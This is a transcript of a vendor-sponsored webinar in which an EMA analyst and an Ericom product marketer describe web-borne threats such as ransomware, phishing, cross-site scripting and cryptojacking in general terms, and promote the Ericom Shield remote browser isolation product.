Webinar: Proactive Endpoint Security Through Threat Prevention

Featuring Steve Brasen, Research Director at Enterprise Management Associates (EMA), and Daniel Miller, Director of Product Marketing at Ericom Software

  OVERVIEW  |  TRANSCRIPT


Raleigh Gould (Facilitator): Welcome and thank you for joining us for today’s webinar "Proactive Endpoint Security Through Threat Prevention". Our featured speakers are Steve Brasen, Research Director at Enterprise Management Associates and Daniel Miller, Director of Product Marketing at Ericom Software.

Steve’s career at EMA follows 20 years of "in-the-trenches" experience in IT systems support, engineering, and management for high-technology, telecommunications, and financial institutions.

Daniel has more than fifteen years of industry experience in corporate and product marketing, business development and product management for an array of technology services, hardware and software solutions – with a strong focus on cybersecurity.

Before I hand things over to today’s featured speakers, I wanted today’s audience to know that they will be concluding the presentation by taking your questions. Do feel free to log them anytime, using the Q&A functionality. Also, today’s event is being recorded and you will receive a follow-up email from EMA that will include the on-demand playback, a PDF of the speaker slides, and some additional resources from Ericom Software. So, I do hope that you will check that out. Now, I’d like to go ahead and turn today’s webinar to our first featured speaker, Steve Brasen. Steve.

Steve Brasen: Thank you, Raleigh. Hello everyone and thank you all for joining us today for our discussion on enabling proactive endpoint security through threat prevention. Endpoint security is now broadly recognized as the most critical IT management process across all enterprise verticals and horizontals, and I am delighted to be able to share with you today some insights into the current state of enterprise requirements for endpoint security, as well as some of the most effective approaches to reducing risks while simplifying security administration practices.

First, here’s a quick look at the agenda for my portion of the presentation. We’ll start by reviewing the current and emerging end user requirements that are challenging IT organizations and security managers, to meet compliance and SLA commitments.

Next, we’ll take a look at the rapidly evolving threat landscape and reveal the leading attacks that few organizations are currently prepared to prevent. In particular, we will take a deep dive into web-borne threats which are on the rise thanks to an increasing reliance on web-hosted SaaS solutions to drive business productivity. All this will help set the stage for us to identify responsible end user computing security practices that will ensure organizations are proactively preventing threats rather than reactively remediating breach events only after they have been introduced. And finally, I’ll sum up all the discussion with a few conclusions on enabling proactive threat prevention.

It should come as no surprise that we live in an IT-centric world. No modern-day business can survive without the creation, distribution and consumption of digital information. In fact, in every industry sector, the ability of businesses to meet organizational goals is broadly dependent on the use of a wide variety of IT resources, including applications, data, email, messaging, collaboration tools and many other business-hosted services. Because of this, IT support organizations in recent years have been fundamentally transformed from administering and repairing hardware platforms and operating systems on endpoint devices, to being principally a provider of IT software services. The generation of millennials, who now constitute the majority of the global workforce, have been a key driver in enabling this transformation.

Today, end users have a much greater understanding, appreciation and dependency on digital services than ever before, and they are much more self-sufficient with managing their own devices than they were just a decade ago. As a consequence, workers are now demanding unprecedented access to business IT resources, and consider them an essential component to the success of their job tasks. Today’s workforces are not just content with having access to enterprise applications, data and services, they expect IT resources to always be immediately available and intuitive to access.

Nowhere is this more visible then in organizations that utilize complex access and authentication processes that significantly reduce end user productivity. Every time a user has to stop what they are doing to remember or enter passwords or pins or enable VPN connections or things like that, it distracts them from performing their job tasks. In fact, a distracted worker can take as much as fifteen minutes to refocus back on their target tasks. During the course of an average day, this can take a significant toll on workforce productivity. Commonly, these unproductive implementations are called high-friction environments, because of the excessive number of time-consuming steps required for accessing essential IT resources.

Clearly, users should not have to jump through hoops just to get their jobs done. Also, organizations can directly correlate end user satisfaction with IT experiences. Organizations with low-friction environments are more likely to have and retain quality, satisfied workers than those with high friction environments, which in turn improves the reputation of IT service organizations. So, overall, user experiences with IT services should be considered a key driver for business productivity and profitability.

For IT managers, the emerging challenges are not just related to increased pressure from end users but also due to increased complexities in the software hosting ecosystems. Just a decade ago, enterprise software was almost exclusively hosted on business servers or installed directly on endpoints. Today, business applications, data and services are also on a wide variety of public and private environments. Most notably, according to EMA survey-based research, cloud hosted Software as a Service or SaaS platforms have outpaced all other methods of application hosting. Since each hosting environment typically has its own separate process for enabling access, organizations have rapidly found themselves managing complex layers of access and security processes.

Our survey-based research results also indicated broad requirements for achieving regulatory compliance commitments. In total, 95% of businesses that responded to a recent EMA survey indicated that they needed to meet regulatory compliance. Not surprisingly, regulatory compliance aligns closely with particular industries, as you can see with our data broken out in this particular chart. For instance, GLB is heavily required for financial institutions, Six Sigma is common in manufacturing, and HIPAA compliance was noted by all survey respondents in healthcare industries.

While regulatory compliance encompasses a number of IT management processes, common to all of them is the need to ensure secure access to business applications and data. Unfortunately, the need to meet regulatory and business requirements for ensuring security of IT resources has become the primary challenge for IT support organizations. In fact, ensuring the security of IT services tops every list of IT management requirements that we investigated in our survey-based research: It was the most difficult to manage, the most time consuming, the most expensive. And according to surveyed end users, it was the greatest inhibitor to workforce productivity.

The primary reason for this is related to the increased requirements for IT resource access that we’ve just been talking about. Access and security are in many ways diametrically opposed forces. The more access to services you provide, the more security you need to protect them; and the more security you add, the more friction you add to end user experiences.

In an attempt to satisfy both, many organizations have adopted one-dimensional approaches to IT security, such as basic virus protection software, that leave gaping holes in their security perimeter and are unable to address many of the emerging attack vectors.

But you don’t have to take my word for that, just pick up a newspaper. Hardly a week goes by that you don’t see an article about the latest shocking security breach. These aren’t just small companies but often large corporations that you would expect would employ only the highest level of security. In just the last year or so, Yahoo was breached twice, exposing access to more than a billion accounts; Uber had a data breach that exposed access to 57 million customers and drivers. In January of this year, the children’s toy manufacturer, VTech, was the victim of a cyber-attack that exposed the personal data of roughly 6.4 million children worldwide. And you are undoubtedly aware of the credit reporting agency, Equifax, which was hacked last year, exposing the personal information of 143 million people – including credit card numbers, social security numbers, birth dates, addresses and other personal identification information.

Some of the other companies that experienced major security breaches just in the last year or so include Google Mail, eBay, River City Media, VeriFone, Dun & Bradstreet, Saks Fifth Avenue, UNC Health Care, Arby’s, Chipotle, Sonic, Sabre, Brooks Brothers, DocuSign, Kmart, Blue Cross Blue Shield, Verizon, Hyatt Hotels, the U.S. Securities and Exchange Commission, and many, many others. Honestly, I don’t have time to list them all; they’re coming out weekly.

The damage that can be done here is real, and can be devastating to businesses of any sizes or types. Just a few of the potential risks include the risk of someone stealing one of your user’s identities, the loss of business reputation, significant profit loss and the loss of customers, an inability to meet regulatory commitments – and any of these can result in direct financial losses, such as paying out fines and lawsuits.

While there isn’t time to discuss every single type of security risk, I want to cover just a few of the most insidious and impactful threats that have been emerging recently. What we have traditionally considered to be malware has been evolving. Hackers have figured out ways to work around traditional security technologies like first-generation sandboxes and security-based gateways. We call this "evasive malware" for its ability to evade the most common malware protection approaches. These attacks are constantly changing. Every time a security solution provider adds a new feature to address evasive malware, hackers change the approach to something else. It’s like trying to herd cats; they scatter in a hundred different directions.

Malware attacks are also becoming more targeted. Where in the past attacks were designed to cast a wide net and try to grab as many users as they could fool into drinking their poison, now they are being designed with a specific purpose. Now they may be targeting a particular company or a particular industry, or users with particular attributes. Since targeted attacks only affect a limited number of targets, it’s actually less likely that they will be identified as a threat by the malware solution providers.

Malware has actually become a big business unto itself. While most people think of a hacker as a teenager sitting in mom’s basement surrounded by home computing equipment and a bunch of stale pizza boxes, it’s actually become a very serious profession in many countries, particularly Russia and China. These businesses have even spawned Malware as a Service platforms that operate like a SaaS model to provide targeted malware attacks. With just a little bit of knowledge, any of you could, right now, go out onto the dark web and purchase a Malware as a Service solution that will allow you to customize an attack to perform any mischief you desire. For the right price, anyone can use Malware as a Service to steal secrets from business competitors or interfere in foreign government elections or influence financial markets. I know this sounds like the stuff of tinfoil-hat conspiracy theories, but it’s all actually happening. Seriously, it is well documented. Go out and Google it; I’m not lying to you.

Of course, I can’t talk about the evolving threat landscape without specifically discussing ransomware. Over the last two years, damage costs resulting from ransomware attacks increased a whopping 1500%. Clearly this has become the tool of choice for hackers. WannaCry has arguably attained the most infamous reputation. But this is actually only one of what can be considered a new class of ransomware threats that encrypt key system data until a fee is paid to unlock it and re-enable access. Other modern variations of ransomware include Petya, NotPetya, Locky, Crysis, Bad Rabbit, Nemucod, Jaff, Cerber, Spora, Cybermix and Jigsaw.

The difference between these types of ransomware involves the methods used to trick users into downloading the encryption malware, the types of files on the endpoint devices that are being encrypted, and the methods used to collect payment for re-enabling access. What makes all these ransomware approaches particularly dangerous is that they are almost completely invisible to traditional signature-based antivirus malware protection solutions.

Actually, across the board, it is reasonable to say that signature-based malware products are no longer effective at preventing security breaches. Put simply, a signature is a characteristic of a piece of malware. It could be a change in a registry setting, a redirected web link, a modified code string, or something as simple as a text string in a startup script. Providers of this class of solutions monitor the internet for new malware threats, and then add a signature to an ever-growing library of known threats. When the computer runs the virus scan, it’s checking to see if any of those signatures appear on your system.

The obvious problem here is the lag time between when the malware is first released onto the internet and when endpoint computers are updated with the new signature list. In most organizations, this time period can run between 60 to 90 days, while some endpoints are actually not updated for a year or more. During this lag time, these devices are susceptible to what is known as zero-day attacks, or malware which has not yet had a signature cataloged.

Even worse, though, is the fact that modern-day malware is designed to change or morph into new forms that have no consistent signature for malware protection to identify. Similarly, encrypted files such as those used in ransomware, can’t be read by malware protections since the software doesn’t have the encryption key. Traditional signature-based anti-malware packages are a type of reactive security management, because they only identify threats that are known and documented. As with so many things in life, the real dangers actually come from unknown threats.

There’s another facet to security that should be acknowledged, which I can only describe as the human factor. No security technology ever created can prevent an authorized user from unwittingly giving away access to company data and resources. Let’s face it, most business employees are not particularly security conscious. Their goal is actually to complete their job tasks and security is often an inhibitor to their productivity. If security practices are impeding their ability to communicate with a client or provision materials or publish a report, they will most likely find a way to bypass the security to get their jobs done.

I will give you a great example of this, and one that you’re probably already familiar with. Last year we surveyed 200 business professionals to identify their security habits. 92% of the respondents admitted that they regularly used unsecured methods for sharing company data. For instance, they used a private Gmail or Yahoo email account or a standard Dropbox account to share files. Now what’s particularly shocking about this is the fact that 62 percent of those respondents also indicated that their business provides them with a secure method of data sharing. So clearly the majority of users opted to use the fast and easy solution to avoid the more complex security processes.

This is where the importance of user experience really plays a key role. It is essential for businesses to invest in secure access solutions that are also easy and intuitive for users to employ or quite frankly, they’re just not going to use them. They’ll find some other way to get their job done, even if they have to bypass security.

Web browsers have proven to be a particularly weak link in security enablement. The increased reliance on SaaS and web-based software has substantially increased the amount of time business users spend on web browsers. Here again, the human factor is reducing the effectiveness of security policies. Attackers are exploiting users’ inherit laziness, their misplaced trust and – I’m sorry but there’s really no better way to say it – gullibility, to gain access to business systems. Users rarely change passwords, for example. They adopt easy to break passwords, and they utilize the same passwords for multiple accounts, making them very susceptible to "brute force" attacks to break passwords.

Phishing is an even more obvious exploitation of human weaknesses, as phone callers convince users to grant them access to their systems with no more than a few well-chosen words and a basic understanding of human psychology. Did you ever get a phone call from a "Windows service center" or something like that, informing you that your computer has a virus and that they can fix it? Do yourself a favor and just hang up. Just hang up! Otherwise, they will have you initiate a remote login session through your web browser, which they will use to install ransomware or some other insidious malware, and then charge you hundreds of dollars to clean it up.

Users also fall for phishing schemes with emails sent to their private email accounts. These emails may look like official messages coming from their banks or other professional institutions, but they embed links that can actually point to malware sites, or will actually download malware onto your system or again, ransomware.

Similarly, clickbait links on websites can actually be harboring access to malware. So you may want to think twice before clicking that link to the top ten things that will be revealed in the next season of Game of Thrones, or you’ll find that the next casualty of war will actually be your own desktop PC.

There’s no cure for the human factor. We’re all human; we all make mistakes. Even the most hardened security professionals sometimes do stupid things, whether they’ll admit it or not. In fact, I would argue that in the role of security management, it’s important to incorporate the human factor into security processes that will take steps to prevent users from being exploited.

There are also some insidious ways attackers exploit web browsers that do not involve the participation of users. A rapidly growing problem is the modification of browser security settings, or to alter browser shortcuts to take you to malicious sites. Most commonly targeted are the most popular browsers: Chrome, Safari, Firefox, Edge, and Internet Explorer. Obviously if a hacker is going to take the time to write malware that will change the browser’s behavior, he’s going to pick one of the ones that are the most used.

Malware can also make changes to network proxy settings and registry keys that may alter the behavior of your web browsers. And within a business network, the problem can actually be compounded: a modified browser can actually be turned into a proxy that attacks other endpoints without the user’s knowledge. So a single compromised PC could spread malware attacks to every other PC on a local network.

Another problem is cross-site scripting attacks. Here’s how it works: A hacker injects malicious scripts into the HTML code on a website that would otherwise be considered trusted like McDonalds or Walmart – I’m not picking on anybody in particular, but something like that, that you would think would be reliable and safe. When an unsuspecting user accesses that page, they may inadvertently activate the malicious script, allowing the attacker access to browser-stored information, such as cookies or session tokens. The embedded scripts could also rewrite the actual HTML code for that page to redirect users to malicious pages or outright download malware. The upshot of all this is that we can no longer consider any website as safe or trusted. All websites must be considered suspicious, regardless of the organization hosting them.

An adjacent exploitation to cross-site scripting that is also on the rise has come to be known as cryptojacking. As you’re all probably aware, the use of cryptocurrencies such as Bitcoin, Ethereum, DigitalNote and Litecoin, has been steadily increasing for the past five years. In fact, there are actually over 900 different types of cryptocurrencies currently active worldwide, representing a total capitalization of about $166 billion. It really is big business.

This has led to a new money-making opportunity for organizations who manage the currency transaction in the cryptocurrency blockchain. Cryptocurrency mining, as it’s come to be called, was intended to be performed on large computer systems. So for companies with large datacenters that have excess idle time, this turned out to be a great way for them to earn a little extra cash on the side; just have the computers mine cryptocurrency when they’re not otherwise in use.

However, some very enterprising individuals figured out that they can leverage consumer web browsers to do the decryption process for them, so they don’t actually need access to a powerful computer system at all. Basically, the company hosts a website that looks innocuous and safe and posts an executable file that users unknowingly download. Most commonly today, these executables are being installed by leveraging JavaScript APIs. The executable then hammers away at your users’ computer processor to perform the cryptocurrency mining. As this is being performed on thousands or even tens of thousands of endpoints simultaneously, the cryptojackers are making a stunning amount of money with little or no investment.

While this is certainly an unethical practice, cryptojacking, stunningly, is not actually considered illegal, which has only emboldened the cryptocurrency mining community. However, the result is that your organization’s computers may be being used to increase somebody else’s profitability at the expense of system performance and by extension, workforce productivity.

All of these dangers we’ve been talking about point to a failure of traditional malware protection solutions, particularly because they are reactive in nature. This is resulting in direct quantifiable cost to business budgets and performance. Breach events result in low-performing or unusable systems, the loss of sensitive business data, and the encryption of critical resources held for ransom. Resolving these problems takes valuable time away from IT administrators who would be more effective focusing on business improvements and new service introductions.

Additionally, while compromised systems are being remediated, the affected users are not being productive, which could affect service to customers or the completion of business critical tasks or the achievement of new market opportunities. The processes for cleaning defective systems can themselves be costly, since organizations may have to invest in multiple remediation tools, or hire expert consultants to clean these systems.

Rather than wasting time, money and effort to put out security breach fires, the better approach is to ensure that the fires never get set in the first place. This is what it means to be proactive.

To be proactive, an endpoint security solution must operate in real time. As we’ve seen, with a reactive solution such as a signature-based malware package, a threat is released into the public, and it is only after it has affected or impacted a large number of endpoints that the solution provider will create a signature for that threat and distribute it to customers. This is essentially closing the barn door only after the horse has come home.

A proactive solution responds to both known and unknown threats by identifying questionable behaviors that an endpoint device may be exhibiting and responding to those threats in real time. This includes identifying and blocking access connections initiated directly by malware or unknowingly by the user himself. Also, these solutions may prevent the unauthorized sharing of business data or its distribution through unsecure services like public email accounts. Any files downloaded from a remote source should be immediately scanned to ensure they are not harboring any malicious code or questionable links.

A real-time solution eliminates the possibility of zero-day attacks by immediately responding to risky behaviors, rather than waiting for a solution provider to update its malware catalog with new signatures. This is how you shut and lock the front door, proactively preventing attacks rather than systematically responding to them only after they have happened.

A comprehensive security portfolio will be multifaceted, achieving defense in depth by providing key layers of endpoint security. Secure methods of enabling access should be implemented to all IT services hosted in the enterprise software ecosystem, including internal and external public and private hosting environments.

At the same time, it is also important not to lose sight of the human factor in enabling a proactive endpoint security solution. Each layer of endpoint security should incorporate a low-friction approach to enabling user access, to be sure that users will be able to use the system and not only employ it but will also want to use the system. End user buy-in should be considered one of the critical measurements of success in the introduction of an endpoint security platform.

Given the universal business reliance on internet access and web services, all organizations should consider the enablement of secure browser access to be one of the key building blocks of an endpoint security portfolio. Any solution lacking in browser support must be considered incomplete.

If your organization is using a generic public browser, without any additional protection, you would consider all browser connections that your users are making to be unsecured, and your business is at high risk of a security breach. Web searches should be limited to only access approved sites, either by blacklisting sites known to be dangerous or whitelisting sites that are expected, at least, to be trustworthy. But of course, remember, that even trustworthy sites can never be completely trusted, so browser activity needs to be continuously monitored to prevent, detect and report risky behaviors.

An ideal approach to enabling secure browser access is called Remote Browser Isolation. This class of solutions ensures secure browser connections by executing the code of a webpage directly inside a secure virtual container, so web code never actually interacts with the operating system on the end user’s device. You can think of the container here as walling off the internet activity inside an impenetrable box, but the box has a clear window that allows total visibility into the website – without risk of inadvertently executing malware or exposing users to exploitation.

Remote browser isolation is centrally managed, so administrators can create policies and perform management tasks globally for all supported users, rather than, say, having to install and maintain scanners on every user’s physical device. Since remote browser isolation operates invisibly to end users, it creates a familiar user experience, allowing users to use and configure the browsers they are most comfortable with, and using them in the way that they prefer to use them.

While most organizations today focus on securing software in their hosting environments and on their endpoints, the most common and crucial gap continues to be securing web access. Remote browser isolation bridges that gap, ensuring secure access while empowering users with easy and reliable access to business IT resources that will boost their productivity.

To sum it all up, there continues to be an acceleration of rapidly evolving security threats. Attackers are finding new and creative ways to circumvent traditional methods of malware protection, particularly those that are designed to reactively respond only to known threats, while failing to address unknown threats. In particular, web browser weaknesses are increasingly being exploited, along with the human factors of the users who employ them. And finally, a proactive endpoint security solution including remote browser isolation platforms can be identified as providing comprehensive real-time protection while enabling low-friction end user experiences.

To help us dig deeper into that last note, I’ve asked Daniel Miller, Director of Product Marketing with Ericom, to join us today to share with us some of his insights into Ericom’s approach to remote browser isolation. Daniel, thank you very much for joining us today.

DM: Thanks, Steve, and thanks for having me. Hello, everyone. I’d like to first take some time to introduce Ericom to those of you who don’t know us. We’ve been a software house for about a quarter of a century now, based in Closter, New Jersey, with tens of thousands of customers around the world and a large network of partners. We’ve been in the secure remote connectivity space all this time. We have customers in security, government, and many other verticals, and they consider us an industry leader in that space.

So indeed, alluding to what Steve was mentioning about web browsers being a weakness that is susceptible to malicious exploitation, we really see in the marketplace that browsers are a major attack vector. 34:30 For example, Kaspersky have shown us that more than 50% of the malware penetrating corporations actually entered through the browser. What we also see is that there are specific browser vulnerabilities that are discovered every day that are focused on trying to penetrate and harm organizations, using the browser as their entry point to the organization.

Now, very clearly what we see in most organizations today is that there are a lot of policies in place, and there’s a lot defense-in-depth strategy. There are plenty of products that are available out there: URL filtering, secure web gateways, and the different anti-viruses and other signature-based products.

But at the end of the day, when we look at this research, we see that the browser is a very serious attack vector and is not being addressed by the current products in the marketplace. The question is, "What needs to be done?" because obviously the existing perimeter defense that we have is not working as well as we want it to.

This is really, as Steve was mentioning, [the case for] remote browser isolation. And why it is coming into play is because now we are becoming much more sophisticated. The hackers are actually wining, they’re a step ahead of the organizations trying to protect themselves. Looking at all this array of multiple products, and the need to keep them up-to-date and patch them, and to make sure that every user coming back after a vacation is really up to date in all the latest anti-virus. As Steve was saying, it actually takes between 60 and 90 days for every individual to actually get up-to-date in all those updates. The reality is that this approach of cat-and-mouse game just doesn’t work.

Now, something else that was mentioned here is container technologies. If beforehand we were talking about sandboxing, we can see now in the marketplace that sandboxing is no longer a good enough protection mechanism because, as we said, hackers are more sophisticated and there is definitely malware out there that "knows" when it is sitting inside a sandbox and knows how to wait to execute when it looks like everything is settled.

The reality is that container technologies have really matured. Whether it’s Docker or other vendors in the marketplace, they are really enabling the ability to initiate a server, an operating system, an application in a fraction of a second and run it in a secure environment.

What it comes down to – and what we are trying to do with remote browser isolation and how we got there – the concept is that with everything that we have protecting ourselves, we want to make sure that browsing – which as Steve clearly said, is one of the things that people do all day long and people are comfortable with, they need to browse in order to do their work – but still, this is a main attack vector. We want to make sure that this browsing happens as far as possible from the user, from the endpoint, and from the internal network.

I want to take you through one of the examples that Steve mentioned. I just want to take you through, maybe, a day in the life of a company, and then I’m going to dive into Ericom Shield, our secure remote browsing solution.

So, let’s look at any typical organization. This one in particular, we’ll call it ABC, a PR firm. We see a typical user who knows the rules, who follows the policy. They have a person who is responsible for making sure everyone is trained, that nobody clicks on what they shouldn’t…but, as usual, we see this day in, day out.

We actually had this today in the office. Somebody showed me a message from so-called "Facebook", – it was not; it was a kind of a phishing attack. We are getting an email from somebody internal, somebody familiar [to us] and we are looking at it [wondering], –Does it look like a legitimate URL? Yeah, why not. – And then we click and, a minute later, we are being infected by ransomware. And not only that – it’s not just a personal thing, right? As we see, all this ransomware and other sophisticated malware actually spread very, very quickly. They have this mechanism internally.

So we actually impacted the whole organization. And the reality is that, although we have antivirus, firewall, URL filtering, intrusion prevention, all of that defense-in-depth, it just didn’t do the job.

So now we are facing the reality that the server is in lockdown and the business is impacted. And the latest information that I have is that around $7 million dollars is the average cost for ransomware, without talking about reputation and all of that.

Now let’s look at the situation that happens when we do the same thing using Ericom Shield, which is a remote browser isolation solution. Yeah, you can click on the link but nothing actually is going to happen. The reason is because the browsing does not run on the endpoint itself but rather in a remote container sitting outside the organization and doing all the browsing for you – we’re going to dive into this in a second. Not only that, but we also discard this container, making sure that nothing can persist within it if any potential malware came through.

So, let’s just go through the process. Traffic goes through Ericom Shield. The user doesn’t know – for the user, it’s just transparent, this process – but the URL, because it’s an unknown URL, is opened in a container, which usually resides either in the DMZ or in the cloud, far away from the end user, the endpoint, and the internal network.

So, any ransomware, malware, phishing attack is detained in this container – it’s not only that the code cannot actually impact [the endpoint], it’s that the container is destroyed minutes after the session is over. As a result, there is no trace, nothing affects the user, and it cannot spread into the organization. As a result, the user was not even aware of the fact that there was potentially wrong-doing. As Steve was mentioning, the human factor is something that we can preach and preach and preach [about] but at the end of the day, we cannot really control.

Now, let’s look more carefully at the product itself. Ericom Shield is a clientless solution. This means that nothing needs to be installed on the endpoint. It supports any regular HTML5 browser, which means that the user can continue to browse normally. This solution is a proxy-based solution. That means that the routing is done at the company level. So, the company is making sure that if you’re going to a whitelisted website, you’re going directly. If you’re going to an unknown website, by default it will route you to a secure browser, again, in the DMZ or in the cloud.

Now, what we do with this information – we actually use a virtual browser to do all the heavy lifting, and we transfer the information back to the user as a virtual content stream. In reality, we are creating pictures, images, and mimicking the user experience. So it’s totally transparent to the user but, in reality, it’s made out of images. Therefore, there is no code that is running on the endpoint. I will show you a little proof in just a second.

When you look at the attack vector, we know that browsing is part of it, but there are also downloaded files. We need to ensure – when you download files, you’re also exposing yourself to potential risk. Therefore, we’ve actually embedded a technology called CDR (Content Disarm and Reconstruction) inside our product in order to make sure that when you browse, you browse safely. We render those images into a virtual content stream, making sure that only images are creating your experience and you’re safe but also when downloading files, the files are being dismantled, cleaned and reconstructed to make sure that they operate normally, but they are clean of any potential viruses.

Maybe just to show you a little example: When you use Ericom Shield versus the regular browser, there’s really no difference. You can use any browser, it looks totally the same, and it’s going to behave the same.

For lack of time, I won’t go into a live demo but all the hovering, all the browsing, all the touching, all the scrolling – everything works normally. But, when you actually go and look under the hood, and you want to see what’s hiding behind any normal website, you see probably several thousands of lines of code, with JavaScript and cross scripting and external URLs and advertising and third-party sourcing. So there is a lot of content that is actually coming. Therefore, as Steve was mentioning, even an innocent-looking site like Walmart – again not picking on anyone in particular, or CNN sites, actually can bring in potential malware.

However, when you’re using Ericom Shield, as I explained, we are doing the browsing in the DMZ or in the cloud, and we are rendering the session in real time, creating only images. What you see here is actually the code, which is very limited. This is the Ericom code and this is pretty much the code saying, bring in those images.

So there’s no active code on this machine right now, running, even though you are actually looking at the same website. From a user perspective, from the user experience, it looks exactly the same. But when you look under the hood, you realize that all the traffic is actually not happening on your device, everything is happening in the server, which can run hundreds of users.

Every session, every URL that you type, actually has its own dedicated container. So if you happen to have open ten tabs (and I know that all of us, including myself, are guilty, [we] have ten, fifteen, twenty tabs open), each one of them is a different container, to make sure there’s no contamination in the containers. The magic is also that a few minutes after you’re done actively looking at this particular URL session, we actually destroy the container, making sure there’s no malware that can persist in the session. So this is how Ericom Shield actually makes browsing safe and transparent to the user.

When you actually come out and look… Okay, I understand the concept, somebody’s doing the heavy lifting far away… What do I need to look for? So what you need to look for, really, is the building blocks for a successful solution.

You need first and foremost to make sure the user experience is flawless.

And you want to go with a clientless solution, because you’re not looking for another project of installing ten thousand – or however many end devices are in your organization.

You want to make sure that the isolation is done remotely and not locally. There are some solutions in the market that believe that they can do local isolation, harden the operating system and put some distant containers locally. But I say don’t do it, make sure that you keep the potential malware [as far] away as possible from you and from your network. We’re actually using Linux because we realized that Linux is more secure by design. Windows is still the most popular platform and everyone is trying to attack it. Linux is currently more protected and we’re also doing a lot of hardening on the Linux [platfrom] so therefore we suggest going in that direction.

And last but not least, file sanitization. Downloading files – and cleaning them – is an essential part of any browsing experience. Your users will want to download files and if you allow this in your organization, you could open a Pandora’s Box. Make sure you have an integrated file sanitization solution.

Obviously, you can find more information on www.EricomShield.com. We will be happy to hear from you.

And just to summarize, if you remember what I showed you previously, as a little example. How do you think your "David" will behave in a similar situation? I mean, we’re all human, we all sometimes make the wrong click.

When you come to look at your existing defense-in-depth strategy, think hard. Are you really protected from web borne threats? If you’re not currently using any type of remote browser isolation solution and you’re currently relying only on signature-type solutions and other types of solutions, spend some time, do some reading, and get familiar with this kind of security, because it is indeed changing your security strategy. So thank you for that.

RG: Thank you, Daniel. If you have questions, you can log them now using the Q&A functionality. I am going to go ahead and jump in to the questions. Daniel, there have been a couple that have come in for you while you were presenting. The first is: "Would the secure virtual container introduce extra latency to the execution of the application being protected?"

DM: Right. As I said, we’ve been in that business for a quarter of a century, so we definitely know what we are doing in terms of software development. We are using containers, hardened containers, we’re using a lot of our inside expertise, and first and foremost, user experience is everything in this kind of solution.

So, when we now work with our customers, the first feedback that we get is, "Hey, the solution performance is great." Because if the performance is lagging then obviously people will say, "Well, it’s an interesting concept, I like it, but I can’t really work like that." We actually work internally, in the company everyone is 100% percent under the policy of using Ericom Shield. People forget that we actually use it. So, latency as a concept, yes, it must exist, but we limit it to a very, very small, millisecond that would not make any difference for a normal browsing experience.

RG: Thank you for that clarification. The next question is, "Can you clarify how Ericom recognized that the process in the container was a bad attempt?"

DM: Okay. So, as I’ve said, it’s almost a philosophical approach, protecting against the known and the unknown. If we want to protect against the known, we are looking at the signature[-based] and all types of other products, and obviously they’re not doing the work.

So, what we have decided is that it’s less important to say what’s good and what’s bad and therefore we just want to make sure we isolate, and that’s the concept. So, we don’t really "care" what’s coming through the session. If this website has not been whitelisted and it’s not been blacklisted along the way, then by default you are routed to the [virtual] browser, to the DMZ or to the cloud, and we will use virtual browsing to do the browsing.

So, whether there was ransomware inside or not, we don’t really care because you are protected. What we do is we’re going to render the images and you’re going to get a normal browsing experience. And if it’s a bad website trying to do something, then probably nothing is going to show. But you’re not going to be affected – we’re not trying to go backwards and say, "Oh, okay, maybe it was NotPetya." We don’t care because at this point in time, we already exterminated the ransomware and eliminated the container altogether, so this ransomware doesn’t exist anymore – the container is gone and, with it, the operating system.

RG: OK, thank you for that information. Another question, Daniel, that came in is, "How much extra resource would a server need to support multiple instances of the virtual container?"

DM: So obviously the solution requires some hardware. We have a management server and we have a browsing farm. And depending on the number of users – we have a little tool to help you do the math – we can have many hundreds of users browsing on one single server. We actually do a lot of work in the background to optimize the browsing, making sure every browsing session is maximized, while browsing sessions that are happening in the background are getting less resources. So, we’re really able to maximize the computing power that you have. You still need to have, as I said, a management server and a browsing farm, and multiply the browsing farm according to the number of users. There’s also issues of redundancy but it’s not a huge indefinite in terms of hardware, not at all.

RG: Good to know, thank you. Steve, jumping over to you. "I’ve heard there’s been an increase in malicious code signing. What exactly is that?"

SB: Code signing, oh my goodness. Yes, that actually is a trend that we’ve been seeing as well and I think it’s actually another great example of how signature-based malware protection solutions can be exploited.

So basically, trusted software developers sign their code with a digital signature that’s granted to them from a third-party certification agency. Signature-based malware scanners actually skip programs that have these signatures in them, because they automatically assume that they’re trustworthy applications and that actually reduces the scanning time because it doesn’t have to do every application, just the ones it doesn’t see a signature on. But a certification authority actually has no way of telling the difference between a trustworthy software developer and a malicious software developer. So, a lot of bad software is falling between the cracks here.

Now, this is particularly used to distribute adware today. But there’s really no reason it can’t be used for more insidious purposes in organizations that are relying on signature-based security solutions – like distributing ransomware or something. Just the idea that the malware scanning solution is not filtering those out, means it’s bypassing security. And again, I think a great example of how doing something that’s more proactive, closing the front door – that is, actually [blocking] this code from actually entering the business in the first place is going to prevent the problem from happening, rather than reactively trying to scan and identify these after the fact.

RG: Thank you, Steve. Let’s take one final question before we hit the top of the hour. Concluding with you, Daniel, "I understand that browsing is done in a container, but can’t the container be infected as well?"

DM: As I mentioned, the containers themselves are all hardened containers, hardened Linux containers, sitting in the DMZ or in the cloud, and their life span is very short. That means that at the end of the session or shortly after, the containers are actually being terminated, therefore eliminating any persistency [of any malware] that potentially may be in the container. So although nothing is 100 percent, and we’ve all been in security long enough to know that nothing is 100 percent, still containers are regarded as a pretty safe mechanism so far. We’ve hardened them, we’ve eliminated many services that are not required for browsing. So we have containers that are very focused just for browsing.

For example, Steve was mentioning, crypto-jacking. Our containers are very, I would say, slim in resources. They can do the browsing and not much more; that’s how we build them. So using those containers and eliminating them right after really makes sure that everything is safe in the system.

RG: Great, thank you. I wanted to thank our audience for taking time out of your schedule to join us. We love to get attendees at our live events and I hope that you’ll check out the follow-up email that EMA will be sending out later today. It’s going to include resources from today’s event. I hope that we see you at a future webinar. Thanks again for joining us and enjoy the rest of your day.

Featuring Steve Brasen, Research Director at Enterprise Management Associates (EMA), and Daniel Miller, Director of Product Marketing at Ericom Software

  OVERVIEW  |  TRANSCRIPT


Today’s workforces consider web-based resources and applications to be indispensable business tools, and expect access to these resources to be straightforward and always available. Unfortunately, browsers are also primary threat vectors for ransomware, phishing, malvertising, drive-by downloads and other cyber threats.

Classic detect-and-block security offerings, such as anti-virus and URL filtering, are simply unable to cope with the rapid evolution and proliferation of attack signatures and patterns to which the average web browser is exposed on a daily basis. IT and security staff find themselves constantly struggling to tighten their defenses against malicious exploits and cyber-attacks, on the one hand, while facilitating transparent access to browser-based resources, on the other hand.

In this webinar, EMA Research Director, Steve Brasen, and Ericom Director of Product Marketing, Daniel Miller, present actionable information on upgrading your organization’s defense-in-depth strategy to better protect organizational systems from the evolving threat landscape, without adding friction to end user experiences.



Please make sure that the user you've entered is the one used for past Ericom registration and try again. If still doesn't work please register as a new user.